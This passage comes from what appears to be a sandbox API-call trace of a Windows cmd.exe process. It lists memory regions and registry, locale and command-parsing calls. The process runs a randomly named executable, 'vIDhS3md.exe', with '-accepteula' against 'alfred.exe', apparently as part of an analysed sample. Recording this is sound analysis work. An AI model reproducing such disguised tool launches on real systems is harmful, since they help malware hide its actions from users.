"private_0x00000000005c0000" filename = "" Region: id = 1545 start_va = 0x6c0000 end_va = 0x6c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 1546 start_va = 0x6d0000 end_va = 0x6d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 1547 start_va = 0x6e0000 end_va = 0x6e1fff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 1548 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1549 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 1550 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1551 start_va = 0x7fa70000 end_va = 0x7fa92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fa70000" filename = "" Region: id = 1552 start_va = 0x7fa94000 end_va = 0x7fa94fff entry_point = 0x0 region_type = private name = "private_0x000000007fa94000" filename = "" Region: id = 1553 start_va = 0x7fa9c000 end_va = 0x7fa9efff entry_point = 0x0 region_type = private name = "private_0x000000007fa9c000" filename = "" Region: id = 1554 start_va = 0x7fa9f000 end_va = 0x7fa9ffff entry_point = 0x0 region_type = private name = "private_0x000000007fa9f000" filename = "" Region: id = 1555 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1556 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1557 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 1558 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1559 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 1560 start_va = 0x730000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 1561 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1562 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1563 start_va = 0x930000 end_va = 0xa2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 1564 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1565 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1566 start_va = 0x6f0000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 1567 start_va = 0x740000 end_va = 0x7fdfff entry_point = 0x740000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1568 start_va = 0x800000 end_va = 0x8fffff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 1569 start_va = 0xbd0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 1570 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1571 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1572 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1573 start_va = 0x7f970000 end_va = 0x7fa6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f970000" filename = "" Region: id = 1574 start_va = 0x7fa99000 end_va = 0x7fa9bfff entry_point = 0x0 region_type = private name = "private_0x000000007fa99000" filename = "" Region: id = 1575 start_va = 0x540000 end_va = 0x543fff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1576 start_va = 0x550000 end_va = 0x553fff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1577 start_va = 0xbe0000 end_va = 0xf16fff entry_point = 0xbe0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1578 start_va = 0x74990000 end_va = 0x74a20fff entry_point = 0x74990000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1579 start_va = 0x7f5e0000 end_va = 0x7f96ffff entry_point = 0x7f5e0000 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Thread: id = 139 os_tid = 0xe0c [0212.031] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0212.031] __set_app_type (_Type=0x1) [0212.031] __p__fmode () returned 0x77984d6c [0212.031] __p__commode () returned 0x77985b1c [0212.031] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0212.032] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0212.032] GetCurrentThreadId () returned 0xe0c [0212.032] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe0c) returned 0x84 [0212.032] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0212.032] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0212.032] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.034] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0212.034] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x6bf7e0 | out: phkResult=0x6bf7e0*=0x0) returned 0x2 [0212.035] VirtualQuery (in: lpAddress=0x6bf7e7, lpBuffer=0x6bf798, dwLength=0x1c | out: lpBuffer=0x6bf798*(BaseAddress=0x6bf000, AllocationBase=0x5c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0212.035] VirtualQuery (in: lpAddress=0x5c0000, lpBuffer=0x6bf798, dwLength=0x1c | out: lpBuffer=0x6bf798*(BaseAddress=0x5c0000, AllocationBase=0x5c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0212.035] VirtualQuery (in: lpAddress=0x5c1000, lpBuffer=0x6bf798, dwLength=0x1c | out: lpBuffer=0x6bf798*(BaseAddress=0x5c1000, AllocationBase=0x5c0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0212.035] VirtualQuery (in: lpAddress=0x5c3000, lpBuffer=0x6bf798, dwLength=0x1c | out: lpBuffer=0x6bf798*(BaseAddress=0x5c3000, AllocationBase=0x5c0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0212.035] VirtualQuery (in: lpAddress=0x6c0000, lpBuffer=0x6bf798, dwLength=0x1c | out: lpBuffer=0x6bf798*(BaseAddress=0x6c0000, AllocationBase=0x6c0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0212.035] GetConsoleOutputCP () returned 0x1b5 [0212.035] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0212.035] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0212.035] _get_osfhandle (_FileHandle=1) returned 0xc0 [0212.035] SetConsoleMode (hConsoleHandle=0xc0, dwMode=0x0) returned 0 [0212.035] _get_osfhandle (_FileHandle=1) returned 0xc0 [0212.035] GetConsoleMode (in: hConsoleHandle=0xc0, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 0 [0212.035] _get_osfhandle (_FileHandle=0) returned 0x38 [0212.035] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0212.036] GetEnvironmentStringsW () returned 0x937f40* [0212.036] FreeEnvironmentStringsA (penv="=") returned 1 [0212.036] GetEnvironmentStringsW () returned 0x937f40* [0212.036] FreeEnvironmentStringsA (penv="=") returned 1 [0212.036] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x6be744 | out: phkResult=0x6be744*=0x94) returned 0x0 [0212.036] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x6be748, lpData=0x6be750, lpcbData=0x6be74c*=0x1000 | out: lpType=0x6be748*=0x0, lpData=0x6be750*=0x90, lpcbData=0x6be74c*=0x1000) returned 0x2 [0212.036] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x6be748, lpData=0x6be750, lpcbData=0x6be74c*=0x1000 | out: lpType=0x6be748*=0x4, lpData=0x6be750*=0x1, lpcbData=0x6be74c*=0x4) returned 0x0 [0212.036] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x6be748, lpData=0x6be750, lpcbData=0x6be74c*=0x1000 | out: lpType=0x6be748*=0x0, lpData=0x6be750*=0x1, lpcbData=0x6be74c*=0x1000) returned 0x2 [0212.036] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x6be748, lpData=0x6be750, lpcbData=0x6be74c*=0x1000 | out: lpType=0x6be748*=0x4, lpData=0x6be750*=0x0, lpcbData=0x6be74c*=0x4) returned 0x0 [0212.036] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x6be748, lpData=0x6be750, lpcbData=0x6be74c*=0x1000 | out: lpType=0x6be748*=0x4, lpData=0x6be750*=0x40, lpcbData=0x6be74c*=0x4) returned 0x0 [0212.036] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x6be748, lpData=0x6be750, lpcbData=0x6be74c*=0x1000 | out: lpType=0x6be748*=0x4, lpData=0x6be750*=0x40, lpcbData=0x6be74c*=0x4) returned 0x0 [0212.036] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x6be748, lpData=0x6be750, lpcbData=0x6be74c*=0x1000 | out: lpType=0x6be748*=0x0, lpData=0x6be750*=0x40, lpcbData=0x6be74c*=0x1000) returned 0x2 [0212.036] RegCloseKey (hKey=0x94) returned 0x0 [0212.036] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x6be744 | out: phkResult=0x6be744*=0x94) returned 0x0 [0212.036] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x6be748, lpData=0x6be750, lpcbData=0x6be74c*=0x1000 | out: lpType=0x6be748*=0x0, lpData=0x6be750*=0x40, lpcbData=0x6be74c*=0x1000) returned 0x2 [0212.036] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x6be748, lpData=0x6be750, lpcbData=0x6be74c*=0x1000 | out: lpType=0x6be748*=0x4, lpData=0x6be750*=0x1, lpcbData=0x6be74c*=0x4) returned 0x0 [0212.036] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x6be748, lpData=0x6be750, lpcbData=0x6be74c*=0x1000 | out: lpType=0x6be748*=0x0, lpData=0x6be750*=0x1, lpcbData=0x6be74c*=0x1000) returned 0x2 [0212.036] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x6be748, lpData=0x6be750, lpcbData=0x6be74c*=0x1000 | out: lpType=0x6be748*=0x4, lpData=0x6be750*=0x0, lpcbData=0x6be74c*=0x4) returned 0x0 [0212.037] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x6be748, lpData=0x6be750, lpcbData=0x6be74c*=0x1000 | out: lpType=0x6be748*=0x4, lpData=0x6be750*=0x9, lpcbData=0x6be74c*=0x4) returned 0x0 [0212.037] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x6be748, lpData=0x6be750, lpcbData=0x6be74c*=0x1000 | out: lpType=0x6be748*=0x4, lpData=0x6be750*=0x9, lpcbData=0x6be74c*=0x4) returned 0x0 [0212.037] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x6be748, lpData=0x6be750, lpcbData=0x6be74c*=0x1000 | out: lpType=0x6be748*=0x0, lpData=0x6be750*=0x9, lpcbData=0x6be74c*=0x1000) returned 0x2 [0212.037] RegCloseKey (hKey=0x94) returned 0x0 [0212.037] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb4325c [0212.037] srand (_Seed=0x5bb4325c) [0212.037] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"alfred.exe\" -nobanner" [0212.037] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"alfred.exe\" -nobanner" [0212.037] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0212.037] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x937f48, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0212.037] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0212.037] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.037] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0212.037] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.037] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0212.037] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0212.037] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0212.037] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0212.037] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0212.037] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0212.037] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0212.037] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0212.037] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0212.037] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x6bf51c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0212.037] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x6bf51c, lpFilePart=0x6bf514 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x6bf514*="Desktop") returned 0x1d [0212.037] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0212.038] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x6bf298 | out: lpFindFileData=0x6bf298) returned 0x938158 [0212.038] FindClose (in: hFindFile=0x938158 | out: hFindFile=0x938158) returned 1 [0212.038] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x6bf298 | out: lpFindFileData=0x6bf298) returned 0x938158 [0212.038] FindClose (in: hFindFile=0x938158 | out: hFindFile=0x938158) returned 1 [0212.038] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0212.038] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x6bf298 | out: lpFindFileData=0x6bf298) returned 0x938158 [0212.038] FindClose (in: hFindFile=0x938158 | out: hFindFile=0x938158) returned 1 [0212.038] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0212.038] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0212.038] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0212.038] GetEnvironmentStringsW () returned 0x93a070* [0212.038] FreeEnvironmentStringsA (penv="=") returned 1 [0212.038] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0212.039] GetConsoleOutputCP () returned 0x1b5 [0212.039] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0212.039] GetUserDefaultLCID () returned 0x409 [0212.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0212.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x6bf64c, cchData=128 | out: lpLCData="0") returned 2 [0212.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x6bf64c, cchData=128 | out: lpLCData="0") returned 2 [0212.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x6bf64c, cchData=128 | out: lpLCData="1") returned 2 [0212.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0212.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0212.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0212.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0212.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0212.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0212.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0212.040] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0212.040] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0212.040] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0212.040] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0212.040] GetConsoleTitleW (in: lpConsoleTitle=0x938ce0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.041] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0212.041] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0212.041] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0212.041] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0212.042] _wcsicmp (_String1="vIDhS3md.exe", _String2=")") returned 77 [0212.042] _wcsicmp (_String1="FOR", _String2="vIDhS3md.exe") returned -16 [0212.042] _wcsicmp (_String1="FOR/?", _String2="vIDhS3md.exe") returned -16 [0212.042] _wcsicmp (_String1="IF", _String2="vIDhS3md.exe") returned -13 [0212.042] _wcsicmp (_String1="IF/?", _String2="vIDhS3md.exe") returned -13 [0212.042] _wcsicmp (_String1="REM", _String2="vIDhS3md.exe") returned -4 [0212.042] _wcsicmp (_String1="REM/?", _String2="vIDhS3md.exe") returned -4 [0212.043] GetConsoleTitleW (in: lpConsoleTitle=0x6bf338, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.044] GetFileAttributesW (lpFileName="vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x20 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0212.044] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0212.045] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") 